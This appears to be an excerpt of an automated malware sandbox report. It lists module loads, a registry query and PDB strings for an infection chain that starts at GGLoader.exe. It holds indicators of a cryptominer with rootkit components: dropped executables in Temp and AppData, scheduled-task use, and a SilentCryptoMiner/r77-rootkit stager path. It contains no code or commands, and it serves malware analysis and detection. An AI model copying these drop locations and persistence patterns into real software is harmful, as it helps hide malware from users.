Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Section loaded: netutils.dll
Source: C:\Windows\System32\dialer.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\dialer.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\dialer.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\dialer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\dialer.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\dialer.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\dialer.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\dialer.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\dialer.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\dialer.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\dialer.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\dialer.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\dialer.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\GGLoader.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: GGLoader.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: GGLoader.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbQZmW source: powershell.exe, 00000001.00000002.1955811622.000001EC48C05000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\Mining\Miner\SilentCryptoMiner\r77-rootkit-master\Stager\obj\x64\Release\Stager.pdb source: LicSend.exe, 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp, powershell.exe, 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ore.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbD source: powershell.exe, 00000026.00000002.2367295184.0000000005B95000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000001.00000002.1965111928.000001EC48EB5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000026.00000002.2213441971.0000000002851000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: t.Automation.pdb_ source: powershell.exe, 00000001.00000002.1951237178.000001EC48B7C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb23~W4 source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb:3FW3 source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000028.00000002.2583801472.000001C536CC8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
